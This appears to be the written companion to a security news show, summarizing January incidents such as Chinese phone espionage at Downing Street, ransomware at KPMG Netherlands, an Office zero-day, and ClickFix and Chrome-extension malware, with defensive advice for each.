Good Morning Security Gang
We’re almost wrapping up the first month of the year. What a wild month it’s been for practitioners. Today’s show is stacked with stories that hit close to home for governments and enterprises alike from China’s years-long eavesdropping on Downing Street to ransomware striking KPMG Netherlands, phishing campaigns against Okta admins, a Microsoft Office zero-day being actively exploited, and cloud API flaws exposing physical security systems across Europe.
We’ll also break down malware-laced Chrome extensions, India’s tax-season phishing campaigns, and Google’s latest privacy settlement that may just change how companies handle recordings.
"These threat actors aren't going anywhere. They're not. They're going to continue to move. As we move the goalposts forward, they follow along. They're still getting touchdowns. They're still getting field goals. They're still scoring goals. So we have to get more involved in the business process side of the house and we have to communicate it in a business-effective way." James Azar
Coffee cup cheers, y’all — I’ve got my Lavazza medium roast double espresso, so let’s get to work.
China’s Espionage Campaign Hits the Heart of Downing Street
An explosive report from the Telegraph reveals that Chinese intelligence operatives infiltrated senior officials’ mobile phones around 10 Downing Street for years, targeting aides to Boris Johnson, Liz Truss, and Rishi Sunak between 2021 and 2024. The breach reportedly penetrated cabinet-level communications and secure messaging systems, giving Beijing insight into UK diplomatic strategy, negotiation timings, and internal policy debates.
The discovery only surfaced after the U.S. shared intelligence on the “Salt Typhoon” espionage campaign with Five Eyes allies. British authorities are still determining whether Prime Ministers themselves were directly compromised.
As I said on the show:
“If Beijing can listen to Downing Street, imagine what they’re doing to private companies that don’t even have detection capability.”
This operation underscores that China’s cyber ambitions are not about disruption but long-term intelligence positioning — and it’s a wake-up call for global enterprises doing business with the UK or China to assume ongoing exposure and tighten mobile security and diplomatic comms segregation.
Nova Ransomware Hits KPMG Netherlands
KPMG Netherlands confirmed a ransomware incident by the Nova gang, which claimed to have exfiltrated and encrypted sensitive data from the firm’s audit environment.
The danger here lies in data reuse — Nova’s playbook includes leaking authentic-looking audit papers and supplier documents to impersonate clients or commit financial fraud downstream.
My advice on the show was simple:
“This isn’t about encryption — it’s about brand exploitation. Ransomware’s new weapon is trust.”
If you’re a KPMG Netherlands customer:
Revoke all existing integration credentials and enforce callback verification on all audit-related communications.
Set new authentication keywords or key phrases for financial teams.
Reissue updated procedures for how auditors should contact accounts payable.
Operational readiness and internal alignment are your strongest defenses against supply chain fallout.
Okta Admin Phishing Surge Targets Identity Teams
A voice and MFA fatigue phishing campaign is hitting Okta and Microsoft admin teams, where threat actors are calling help desks to request password resets or MFA bypasses, often combining SIM swapping with session hijacking.
The attackers only need one pressured help desk employee to pivot into critical SaaS or VPN access.
To mitigate:
Enforce ticketed, manager-approved resets for privileged accounts.
Require shared secret challenges before approving resets.
Empower help desks to say “no” and back them when they do.
As I emphasized: “If your identity provider is the crown jewel, stop letting anyone reset its keys without ceremony.”
Microsoft Office Zero-Day Actively Exploited
Microsoft has confirmed active exploitation of CVE-2026-21509, a zero-day impacting Office 2016, 2019, LTSC 2021/2024, and Microsoft 365 apps. The vulnerability allows remote code execution through weaponized documents, primarily via malicious macros or content-handling exploits in email attachments.
Attackers are using this to establish initial footholds before EDR signatures update.
Mitigation steps:
Enable “Block all macros from the internet” enterprise-wide.
Minimize exceptions and disable legacy content handlers.
Push patches immediately once released.
As I put it:
“Every time we let one macro through, we’re not helping productivity — we’re funding persistence.”
European Cloud Access Flaws Allow Remote Door Unlocking
Researchers at Sec Consult discovered cloud API flaws and default credentials in several European corporate access control systems, allowing remote attackers to unlock physical doors and view badge logs.
The vulnerable systems belong to Dormakaba, affecting hundreds of enterprises. Attackers could chain these flaws to gain physical entry or steal on-site devices for on-prem pivots.
To mitigate:
Isolate these systems on dedicated OT VLANs.
Remove direct internet exposure and restrict API origins.
Rotate all cloud API keys immediately.
As I said: “You can’t have your door locks talking to the internet — that’s not access control, that’s an open invitation.”
ClickFix Malware Evolves with IT-Theater Trickery
The ClickFix malware campaign has evolved with new fake update installers and scripted payloads disguised as legitimate Windows updates or IT service tools. Delivered via SEO poisoning, malvertising, and phishing, it tricks users into running PowerShell and VBScript combos to install loaders.
Best defenses:
Enforce Windows Defender Application Control and signed installer policies.
Block WScript and CScript execution for all non-IT users.
Monitor for unexpected PowerShell child processes.
Chrome Web Store Extensions Weaponized Post-Approval
A new scheme dubbed “Guaranteed Approval Service” is selling Chrome Web Store approvals to developers, who then flip benign extensions into token-stealing malware after installation.
These extensions hijack OAuth tokens, granting attackers persistent access to SaaS apps and cloud dashboards.
Defensive actions:
Deploy enterprise browser management with allowlists.
Automatically revoke OAuth tokens when extensions are removed.
Treat browsers like endpoints — because they are.
India Tax Season Triggers Phishing Tsunami
It’s tax season in India, which means phishing campaigns impersonating the Tax Authority and banks are surging. Attackers harvest PAN and banking credentials through fake refund portals targeting payroll vendors and expats.
Defensive measures:
Funnel all tax-related communications into a single verified mailbox.
Require out-of-band verification before processing any refunds or changes.
Reinforce awareness among payroll teams about spoofed government domains.
Google Settles $68M Voice Recording Privacy Case
Google will pay $68 million to settle a lawsuit over voice data collection and retention practices from its Assistant and Nest products. Regulators focused on lack of consent and data retention beyond user expectations.
For enterprises, this is a warning: if you record calls or use AI assistants internally, you could be next.
Action steps:
Publish plain-language recording disclosures.
Offer opt-out options to employees and customers.
Enforce automated data deletion policies for recordings.
As I said: “Every ‘this call may be recorded’ message is a liability notice — not a disclaimer.”
Action List
🇨🇳 Secure executive mobile devices and monitor for spyware persistence.
💼 Revoke KPMG-linked credentials and establish callback validation.
🔐 Implement ticketed identity resets with shared-secret challenges.
📄 Patch Microsoft Office zero-day (CVE-2026-21509) immediately.
🚪 Segment access control systems and disable public API exposure.
🧩 Block unsigned installers and disable non-IT scripting tools.
🌐 Lock Chrome extensions to approved lists and monitor token reuse.
🏦 Train payroll and finance teams for tax-season phishing patterns.
🎙️ Revisit voice recording consent and data retention policies.
James Azar’s CISO’s Take
Today’s show was all about one theme — the invisible gates of trust. From Downing Street’s compromised phones to Okta resets, Office macros, and Chrome extensions, every compromise began with misplaced trust in systems, people, or processes. Attackers don’t need new exploits when we keep giving them the keys.
My biggest takeaway? Every security failure is a consent failure. Whether it’s approving a reset, running an installer, or leaving a door API exposed, trust should never be default — it should be earned, verified, and short-lived. The more we shorten the lifetime of that trust, the less room adversaries have to move.
"Today's show is really simple for me. It's about gates and seasons. The gates are the phones, help desk resets, Office content, door APIs, and browser extensions, and even some voice recordings – all are consent moments. If approval is sloppy, controls downstream won't save you. The seasons – audits, tax cycles – are attackers' calendars. They know what's coming. They know we're expecting it, and we're more likely to be fooled and duped." James Azar
Stay alert, stay caffeinated, and as always — stay cyber safe.
